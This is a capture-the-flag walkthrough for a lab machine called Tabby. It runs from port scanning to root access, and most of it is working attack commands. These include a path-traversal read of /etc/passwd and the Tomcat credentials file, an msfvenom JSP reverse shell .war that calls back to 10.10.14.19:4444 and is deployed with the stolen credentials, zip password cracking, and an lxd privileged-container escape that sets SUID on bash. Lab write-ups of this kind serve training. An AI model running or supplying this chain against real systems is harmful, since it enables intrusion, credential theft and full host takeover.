search

Tabby

hashtag
Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.194 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

As we see, port 22 (SSH), port 80 (HTTP), and port 8080 (HTTP) are open. Let's try to obtain more information about the services and versions running on those ports.

nmap -sC -sV -p22,80,8080 10.10.10.194 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

Let's try to enumerate the website a bit more with whatweb.

whatweb http://10.10.10.194

Let's add the megahosting.htb domain, which appears in the email, to the /etc/hosts file.

nano /etc/hosts

Now, let's take a look at the website.

If we take a look at the website on port 8080, we'll see a Tomcat page.

hashtag
Exploitation

If we hit on the NEWS button of the home page, we'll be redirected to the news.php file.

If we take a look at the ULR, we'll see that it has statement as the value of the file parameter.

http://megahosting.htb/news.php?file=statement

We can try to make a Local File Inclusion (LFI) attack. If we set the file parameter to ../../../../../../etc/passwd, we'll be able to see the /etc/passwd file of the Tabby machine.

curl -s 'http://megahosting.htb/news.php?file=../../../../../../etc/passwd'

  • -s silent mode.

We know that the user ash exists. Now that we can list the content of files on the Tabby machine, we could try to enumerate users by listing the content of the tomcat-users.xml file, which is located in the /usr/share/tomcat9/etc/ folder.

curl -s 'http://megahosting.htb/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml'

  • -s silent mode.

And we get the tomcat user and the $3cureP4s5w0rd123! password. Back to the tomcat web page, we can see that there are two links that in which we can authenticate.

If you try to log in with the credentials we found before to the manager_webapp link, you will be rejected, but if you try to log into the host-manager_webapp, you will get in.

Time to get a shell. We'll have to upload a malicious .war file to the tomcat web page. The problem is that the /host-manager/html doesn't have an option to upload .war files. But we can do it with curl. First, let's create the malicious file with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.19 lport=4444 -f war -o shell.war

  • -p indicates the type of payload.

  • lhost local host IP.

  • lport local port of the listener.

  • -f output format.

  • -o save the output to a file.

Now let's upload it with curl.

curl -s -u 'tomcat:$3cureP4s5w0rd123!' 'http://10.10.10.194:8080/manager/text/deploy?path=/shell' --upload-file shell.war

We can verify that it is uploaded with the following command.

curl -s -u 'tomcat:$3cureP4s5w0rd123!' 'http://10.10.10.194:8080/manager/text/list'

Before executing it, we'll have to set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

If we now access the /shell directory, we should get a reverse shell as the tomcat user on the netcat listener.

http://10.10.10.194:8080/shell/

hashtag
Privilege Escalation

First of all, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we take a look at the /var/www/html we'll see the /files/ folder, which contains a .zip backup file.

ls -la /var/www/html/files/

Let's transfer it to our machine. Set an HTTP server on the victim machine with python.

python3 -m http.server 1234

And download the backup file on our local machine.

wget http://10.10.10.194:1234/16162020_backup.zip

If we now try to unzip it, it will ask for a password.

unzip 16162020_backup.zip

We can try to break it with john. First, let's covert the backup file to a format that john will understand.

zip2john 16162020_backup.zip > zipjohn

Now we can break it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt zipjohn

And we get the admin@it password. We could try to become ash user we found earlier with that password, and we'll be able to get the user flag.

su ash

If we see which groups the user ash belongs to, we can see that he belongs to the group lxd.

id

As the ash user belongs to the lxd group, there is a way that we can become root. First, let's download the build-alpine image for lxd on our local machine as the root user.

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

Then, give it execution permissions, and run it.

chmod +x build-alpine

./build-alpine

This will generate a .tar.gz file, which we'll have to transfer to the Tabby machine.

python -m http.server 80

Go to the /dev/shm directory on the victim machine, and download the .tar.gz file.

wget http://10.10.14.19/alpine-v3.15-x86_64-20220321_2150.tar.gz

If we use lxc to list containers, we'll see that the system can not find the binary because the path is not included on the PATH variable.

lxc list

So let's add the path to the PATH variable.

export PATH=$PATH:/snap/bin

echo $PATH

Now we can list containers.

lxc list

There are no containers. Now the idea is to create a container and mount the root file system into the container. First, let's import the Alpine image.

lxc image import alpine-v3.15-x86_64-20220321_2150.tar.gz --alias privEscImage

Then execute the following command, always keeping the default option.

lxd init

Now let's create a container with the image.

lxc init privEscImage privEscCont -c security.privileged=true

  • init action to take, starting a container

  • privEscImage the image to start

  • privEscCont the alias for the running container

  • -c security.privileged=true by default, containers run as a non-root UID. This runs the container as root, giving it access to the host filesystem as root

Now, let's mount the root file system to the /mnt/root folder of the container.

lxc config device add privEscCont privEscDevice disk source=/ path=/mnt/root

If we now list the containers, we'll see our privEscCont, but it is stopped.

lxc list

Let's start it.

lxc start privEscCont

And get a shell inside the container.

lxc exec privEscCont /bin/sh

If we go to the /mnt/root directory, we'll see the entire file system of the Tabby machine.

ls -l /mnt/root

To get a shell as root in to Tabby machine, we could set the SUID permission on the bash binary which is located in the /mnt/root/usr/bin directory.

chmod u+s /mnt/root/usr/bin/bash

ls -l /mnt/root/usr/bin/bash

Now, let's exit the container.

exit

And finally, if we execute bash with the permissions of the owner, we will get a shell as root and all we had to do is reap the harvest and take the root flag.

bash -p

Last updated

Was this helpful?